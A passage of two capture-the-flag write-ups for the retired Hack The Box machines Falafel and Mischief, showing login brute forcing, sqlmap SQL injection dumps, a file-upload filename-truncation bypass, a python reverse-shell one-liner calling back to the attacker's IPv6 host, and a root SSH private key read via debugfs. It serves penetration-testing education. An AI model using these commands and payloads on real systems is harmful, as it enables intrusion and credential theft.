000003: C=200 102 L 657 W 7074 Ch "Aaron"
000004: C=200 102 L 657 W 7074 Ch "Aartjan"
000005: C=200 102 L 657 W 7074 Ch "Abagael"
000006: C=200 102 L 657 W 7074 Ch "Abagail"
000007: C=200 102 L 657 W 7074 Ch "Abahri"
^C
Finishing pending requests...

root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --hw 657 -t 60 -d "username=FUZZ&password=PuckieStyle" http://10.10.10.73/login.php

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.73/login.php
Total requests: 8607

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000065:  C=200    102 L	     659 W	   7091 Ch	  "Admin"
001488:  C=200    102 L	     659 W	   7091 Ch	  "Chris"

Total time: 37.51125
Processed Requests: 8607
Filtered Requests: 8605
Requests/sec.: 229.4511

The next thing that we can try is see if there is a SQL injection vulnerability. For test it, we can insert the following string as username:

and we press login button with random password. The web page answer is: Wrong identification: admin, Bbut we have not insert “admin” in login form → there is SQL injection!

 

Exploiting Web Application Vulnerabilities

Then we make more efforts for SQL injection by using SQLMAP and used “Wrong identification” as a string to be passed at the time of login.

c:\SQLMAP>python sqlmap.py -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel --tables --batch
___
__H__
___ ___[(]_____ ___ ___ {1.2.11.19#dev}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[*] starting @ 14:59:45 /2019-04-02/

--snip--
back-end DBMS: MySQL 5
[14:59:46] [INFO] fetching tables for database: 'falafel'
[14:59:46] [INFO] fetching number of tables for database 'falafel'
[14:59:46] [INFO] resumed: 1
[14:59:46] [INFO] resumed: users
Database: falafel
[1 table]
+-------+
| users |
+-------+

[*] ending @ 14:59:46 /2019-04-02/
c:\SQLMAP>python sqlmap.py -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel -T users --dump --batch
___
__H__
___ ___[']_____ ___ ___ {1.2.11.19#dev}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[*] starting @ 15:01:18 /2019-04-02/

[15:01:18] [INFO] testing connection to the target URL
--snip--
do you want to crack them via a dictionary-based attack? [y/N/q] N
Database: falafel
Table: users
[2 entries]
+----+--------+----------+----------------------------------+
| ID | role | username | password |
+----+--------+----------+----------------------------------+
| 1 | admin | admin | 0e462096931906507119562988736854 |
| 2 | normal | chris | d4ee02a22fc872e36d9e3751ba72ddc8 |
+----+--------+----------+----------------------------------+

[*] ending @ 15:01:19 /2019-04-02/

As you can observe that the password hash for user admin is started with 0 and I don’t know much about this type of hash, so we look in the Google and notice link for Magic hashes.

As you can observe the highlighted md5 hash for the 32-bit string is same as above……………………….

With help of the following credential we login into admin dashboard and move to upload options.

Here we are trying to upload a php file named shell.php but it put an error “Bad extension “as shown

Thereafter we renamed it as shell.php.png and again try to upload.

Ohh! Yes, the file with .png extension get uploaded successfully inside /var/www/html/uploads hence we can to upload a malicious php file or any php backdoor with .png extension.

Spawning Shell

Let’s create a PHP payload for uploading into the web site.

As shown in the given image the PHP file is uploaded successfully inside /var/www/html/uploads.

 

Trying filenames with very long names, I noticed the web app truncates the filename saved on the disk to a maximum of 236 characters.With this logic we can create a file with a 240 chars filename with the last 8 characters set to “.php.png”. Due to the behavior of the web app, it will truncate the last four characters “.png” which will leave us with a file having a “.php” file extension.

Sample filename:

verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php.png

Let’s prepare a php reverse shell with a loooong,loooong file name and host it using python SimpleHTTPServer

Root@kali:~/htb/falafel# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.73 - - [02/Apr/2019 10:10:20] "GET /verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php.png HTTP/1.1" 200 -

Triggering the reverse shell via curl:

root@kali:~/htb/falafel# curl "http://10.10.10.73/uploads/0402-1710_61cb5b7a8480bfc4/verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php"

Netcat listener receiving the reverse shell connection:

root@kali:~/htb/falafel# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.73.
Ncat: Connection from 10.10.10.73:53576.
Linux falafel 4.4.0-112-generic #135-Ubuntu SMP Fri Jan 19 11:48:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
17:14:07 up 1 day, 16:59, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
yossi tty1 Mon00 40:59m 0.15s 0.09s -bash
moshe pts/0 10.10.14.20 15:21 1:52m 0.00s 0.00s -sh
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')" 
www-data@falafel:/$

We open passwd file and notice two system username i.e. yossi and moshe.

www-data@falafel:/$ cd /var/www/html
cd /var/www/html
www-data@falafel:/var/www/html$ ls
ls
assets cyberlaw.txt images login_logic.php style.php
authorized.php footer.php index.php logout.php upload.php
connection.php header.php js profile.php uploads
css icon.png login.php robots.txt
www-data@falafel:/var/www/html$ cat connection.php 
cat connection.php
<?php
define('DB_SERVER', 'localhost:3306');
define('DB_USERNAME', 'moshe');
define('DB_PASSWORD', 'falafelIsReallyTasty');
define('DB_DATABASE', 'falafel');
$db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
// Check connection
if (mysqli_connect_errno())
{
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
?>
www-data@falafel:/var/www/html$

This is MySQL configuration file for MySQL where username is moshe and password is falafelIsReallyTasty

With help of above credential we are trying to ssh login and after making successful login we found the user.txt file from inside /home/moshe

PS C:\Users\jacco> ssh moshe@10.10.10.73
moshe@10.10.10.73's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Tue Apr 2 15:21:50 2019 from 10.10.14.20
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
setterm: terminal xterm-256color does not support --blank
moshe@falafel:~$ ls
user.txt
moshe@falafel:~$ cat user.txt
c86*****9d3

After some more penetration, we enumerated the groups for user moshe and found that the user is in the video group. When we found uses as the member of the video group then for Privilege Escalation we need check frame-buffer device. Because this can lead a local user able to access a frame buffer device file (/dev/fb*) could possibly use this flaw to escalate their privileges on the system.

Let’s have the contents of /dev/fb0 with help of cat command to capture the framebuffer raw data inside /tmp directory as scree.raw

So we have captured the raw data inside /tmp, now you need to take the raw image and convert it to a standard image format say .png but we before that we need to find t the size, use the following command which will print the dimension……………..

Now enter the following command to convert raw data into a .png image format

Then we opened screen.png and got the following image which was showing password: MoshePlzStopHackingMe!for user Yossi.

With help of above-enumerated credential, we have made SSH login successfully and then run following command for getting SSH RSA key.

PS C:\Users\jacco> ssh yossi@10.10.10.73
yossi@10.10.10.73's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Tue Apr  2 15:16:20 2019 from 10.10.14.20
yossi@falafel:~$ groups
yossi adm disk cdrom dip plugdev lpadmin sambashare
yossi@falafel:~$ debugfs /dev/sda1
debugfs 1.42.13 (17-May-2015)
debugfs:  cat /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAyPdlQuyVr/L4xXiDVK8lTn88k4zVEEfiRVQ1AWxQPOHY7q0h
b+Zd6WPVczObUnC+TaElpDXhf3gjLvjXvn7qGuZekNdB1aoWt5IKT90yz9vUx/gf
v22+b8XdCdzyXpJW0fAmEN+m5DAETxHDzPdNfpswwYpDX0gqLCZIuMC7Z8D8Wpkg
BWQ5RfpdFDWvIexRDfwj/Dx+tiIPGcYtkpQ/UihaDgF0gwj912Zc1N5+0sILX/Qd
UQ+ZywP/qj1FI+ki/kJcYsW/5JZcG20xS0QgNvUBGpr+MGh2urh4angLcqu5b/ZV
dmoHaOx/UOrNywkp486/SQtn30Er7SlM29/8PQIDAQABAoIBAQCGd5qmw/yIZU/1
eWSOpj6VHmee5q2tnhuVffmVgS7S/d8UHH3yDLcrseQhmBdGey+qa7fu/ypqCy2n
gVOCIBNuelQuIAnp+EwI+kuyEnSsRhBC2RANG1ZAHal/rvnxM4OqJ0ChK7TUnBhV
+7IClDqjCx39chEQUQ3+yoMAM91xVqztgWvl85Hh22IQgFnIu/ghav8Iqps/tuZ0
/YE1+vOouJPD894UEUH5+Bj+EvBJ8+pyXUCt7FQiidWQbSlfNLUWNdlBpwabk6Td
OnO+rf/vtYg+RQC+Y7zUpyLONYP+9S6WvJ/lqszXrYKRtlQg+8Pf7yhcOz/n7G08
kta/3DH1AoGBAO0itIeAiaeXTw5dmdza5xIDsx/c3DU+yi+6hDnV1KMTe3zK/yjG
UBLnBo6FpAJr0w0XNALbnm2RToX7OfqpVeQsAsHZTSfmo4fbQMY7nWMvSuXZV3lG
ahkTSKUnpk2/EVRQriFjlXuvBoBh0qLVhZIKqZBaavU6iaplPVz72VvLAoGBANj0
GcJ34ozu/XuhlXNVlm5ZQqHxHkiZrOU9aM7umQkGeM9vNFOwWYl6l9g4qMq7ArMr
5SmT+XoWQtK9dSHVNXr4XWRaH6aow/oazY05W/BgXRMxolVSHdNE23xuX9dlwMPB
f/y3ZeVpbREroPOx9rZpYiE76W1gZ67H6TV0HJcXAoGBAOdgCnd/8lAkcY2ZxIva
xsUr+PWo4O/O8SY6vdNUkWIAm2e7BdX6EZ0v75TWTp3SKR5HuobjVKSht9VAuGSc
HuNAEfykkwTQpFTlmEETX9CsD09PjmsVSmZnC2Wh10FaoYT8J7sKWItSzmwrhoM9
BVPmtWXU4zGdST+KAqKcVYubAoGAHR5GBs/IXFoHM3ywblZiZlUcmFegVOYrSmk/
k+Z6K7fupwip4UGeAtGtZ5vTK8KFzj5p93ag2T37ogVDn1LaZrLG9h0Sem/UPdEz
HW1BZbXJSDY1L3ZiAmUPgFfgDSze/mcOIoEK8AuCU/ejFpIgJsNmJEfCQKfbwp2a
M05uN+kCgYBq8iNfzNHK3qY+iaQNISQ657Qz0sPoMrzQ6gAmTNjNfWpU8tEHqrCP
NZTQDYCA31J/gKIl2BT8+ywQL50avvbxcXZEsy14ExVnaTpPQ9m2INlxz97YLxjZ
FEUbkAlzcvN/S3LJiFbnkQ7uJ0nPj4oPw1XBcmsQoBwPFOcCEvHSrg==
-----END RSA PRIVATE KEY-----
debugfs:  cat /root/root.txt
23b*****fa1
debugfs:

HTB – Mischief

Today we are going to solve another CTF challenge “Mischief”. Mischief is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to their experience; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt file

Let’s start off with our nmap Aggressive scan to find out the open ports and services.

c:\Users\jacco>nmap -sV -sC 10.10.10.92
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 08:54 W. Europe Summer Time
Nmap scan report for 10.10.10.92
Host is up (0.028s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
| 256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
|_ 256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.33 seconds

But as you can observe that here we didn’t obtain much information, therefore further I scan for UDP port and from its result we got port 161 is open for SNMP.

c:\Users\jacco>nmap -sU 10.10.10.92
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 08:57 W. Europe Summer Time
Nmap scan report for 10.10.10.92
Host is up (0.029s latency).
Not shown: 999 open|filtered ports
PORT STATE SERVICE
161/udp open snmp

Nmap done: 1 IP address (1 host up) scanned in 34.87 seconds

Because we were knowing SNMP service is enable in the network, therefore I run nmap script command for SNMP enumeration.

root@kali:~/htb/mischief# nmap -p161 -sC -sV -sU 10.10.10.92
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 03:03 EDT
Nmap scan report for 10.10.10.92
Host is up (0.028s latency).

PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: b6a9f84e18fef95a00000000
| snmpEngineBoots: 19
|_ snmpEngineTime: 9h48m31s
| snmp-interfaces: 
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 0.00 Kb sent, 0.00 Kb received
| Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
| IP address: 10.10.10.92 Netmask: 255.255.255.0
| MAC address: 00:50:56:b9:80:1c (VMware)
| Type: ethernetCsmacd Speed: 1 Gbps
|_ Traffic stats: 2.17 Mb sent, 1.58 Mb received
| snmp-netstat: 
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:3366 0.0.0.0:0
| TCP 10.10.10.92:22 10.10.14.20:15739
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.53:53 0.0.0.0:0
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:42621 *:*
|_ UDP 127.0.0.53:53 *:*
| snmp-processes: 
| 1: 
| Name: systemd
| Path: /sbin/init
| Params: maybe-ubiquity
| 2: 
| Name: kthreadd
--snip--
| 591: 
| Name: sh
| Path: /bin/sh
| Params: -c /home/loki/hosted/webstart.sh
| 594: 
| Name: sh
| Path: /bin/sh
| Params: /home/loki/hosted/webstart.sh
| 595: 
| Name: python
| Path: python
| Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/
| 617: 
| Name: sshd
| Path: /usr/sbin/sshd
| Params: -D
--snip--
|   zerofree-1.0.4-1; 0-01-01T00:00:00
|_  zlib1g-1:1.2.11.dfsg-0ubuntu2; 0-01-01T00:00:00
Service Info: Host: Mischief

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.55 seconds

Hmmm!! So here I found something very interesting and it looks like the login credential to be used as authentication to connect port 3366.

Let’s navigate to port 3366 in the web browser and enter the following credential.

Username: loki
Password: godofmischiefisloki

Here, we were welcomed by following web page where it was holding another credential. Let’s dig out another way to utilize this credential for login.

We use a python script called Enyx to find the ipv6 address of the target machine. You can get the script from this link.

root@kali:/opt# git clone https://github.com/trickster0/Enyx.git
Cloning into 'Enyx'...
remote: Enumerating objects: 70, done.
remote: Total 70 (delta 0), reused 0 (delta 0), pack-reused 70
Unpacking objects: 100% (70/70), done.
root@kali:/opt# cd Enyx/
root@kali:/opt/Enyx# python enyx.py 2c public 10.10.10.92
###################################################################################
# #
# ####### ## # # # # # #
# # # # # # # # # #
# ###### # # # ## ## #
# # # # # ## # # #
# ###### # ## ## # # #
# #
# SNMP IPv6 Enumerator Tool #
# #
# Author: Thanasis Tserpelis aka Trickster0 #
# #
###################################################################################


[+] Snmpwalk found.
Created directory: /var/lib/snmp/mib_indexes
[+] Grabbing IPv6.
[+] Loopback -> 0000:0000:0000:0000:0000:0000:0000:0001
[+] Unique-Local -> dead:beef:0000:0000:0250:56ff:feb9:801c
[+] Link Local -> fe80:0000:0000:0000:0250:56ff:feb9:801c
root@kali:/opt/Enyx#
root@kali:/opt/Enyx# nmap -6 dead:beef:0000:0000:0250:56ff:feb9:801c
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 03:07 EDT
Nmap scan report for dead:beef::250:56ff:feb9:801c
Host is up (0.034s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 17.38 seconds

So we navigate to the web browser and explore Target IPv6 address in the URL, it put a login page for command execution panel. So we try to login this page with the credential we found earlier but that wasn’t the valid credential.

Access Victim’s Shell

 

Further, I try brute force for username and successfully get login with the following combination:

Since it was Command Execution Panel where we can run arbitrary system commands, hence this was RCE which could be easily exploited and we can own reverse shell of the target machine.

But before that, you must know Ipv6 address of your local machine for addressing your IP as listening IP.

root@kali:/opt/Enyx# ifconfig tun0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.20 netmask 255.255.254.0 destination 10.10.14.20
inet6 dead:beef:2::1012 prefixlen 64 scopeid 0x0<global>
inet6 fe80::e0da:8b68:3f37:f906 prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 100 (UNSPEC)
RX packets 131 bytes 61874 (60.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 168 bytes 16553 (16.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

For the reverse shell, I use python reverse shellcode from pentestmonkey, and modify lhost IP from our IPv6 address. Since both nodes belong to IPv6, therefore we need a listener which can establish a reverse connection such as ncat, therefore we started ncat as the listener on port 443

root@kali:~/htb/mischief# nc -6 -lvnp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Connection from dead:beef::250:56ff:feb9:801c.
Ncat: Connection from dead:beef::250:56ff:feb9:801c:42176.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python3 -c "import pty; pty.spawn('/bin/bash')" 
www-data@Mischief:/var/www/html$

python reverse shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::1012",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

As soon we will execute the malicious python code, we will get a reverse connection via ncat  or nc6.exe from https://www.sphinx-soft.com/tools/index.html

Great!! You can observe that we have access to remote terminal and let’s try to find out user.txt file to complete our first task. We found the user.txt file in the /home/loki but unable to read it. Although, there was another interesting file “credentials” and here we found another credential.

c:\PENTEST>nc6 -lvp 443
listening on [::] 443 ...
Warning: forward host lookup failed for mischief.htb: h_errno 11004: NO_DATA
connect to [dead:beef:2::1012] from mischief.htb [dead:beef::250:56ff:feb9:801c] 42174: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@Mischief:/var/www/html$ cd /home/loki
cd /home/loki
www-data@Mischief:/home/loki$ ls
ls
credentials hosted user.txt
www-data@Mischief:/home/loki$ cat credentials
cat credentials
pass: lokiisthebestnorsegod

As port 22 was running, therefore we connect to the remote machine through ssh and successfully found user.txt file

PS C:\Users\jacco> ssh loki@10.10.10.92
loki@10.10.10.92's password:lokiisthebestnorsegod
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue Apr 2 07:20:54 UTC 2019

System load: 0.0 Processes: 115
Usage of /: 25.9% of 15.68GB Users logged in: 0
Memory usage: 43% IP address for ens33: 10.10.10.92
Swap usage: 0%


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 1 06:40:22 2019 from 10.10.14.20
loki@Mischief:~$ ls
credentials hosted user.txt
loki@Mischief:~$ cat user.txt
bf5*****060
loki@Mischief:~$ cat .bash_history
python -m SimpleHTTPAuthServer loki:lokipasswordmischieftrickery
exit
free -mt
ifconfig
cd /etc/
sudo su
su
exit
su root
ls -la
sudo -l
ifconfig
id
cat .bash_history
nano .bash_history
exit
find / -name root.txt
whoami
groups
su
exit
loki@Mischief:~$ su
-bash: /bin/su: Permission denied

While exploring more, I found .bash_history file where I found one more credential for root user but loki doesn’t have permission to execute switch user command.

Therefore, we move back to www-data user shell to run switch user command and enter the above-found password for root login, then try to find out root.txt file inside the root directory but there wasn’t any flag. Therefore with the help of find command, we try to enumerate the path of root.txt.

www-data@Mischief:/var/www/html$ su
su
Password: lokipasswordmischieftrickery

root@Mischief:/var/www/html# find / -name root.txt
find / -name root.txt
/usr/lib/gcc/x86_64-linux-gnu/7/root.txt
/root/root.txt
root@Mischief:/var/www/html# cat /usr/lib/gcc/x86_64-linux-gnu/7/root.txt
cat /usr/lib/gcc/x86_64-linux-gnu/7/root.txt
ae1*****807

Author: Jacco Straathof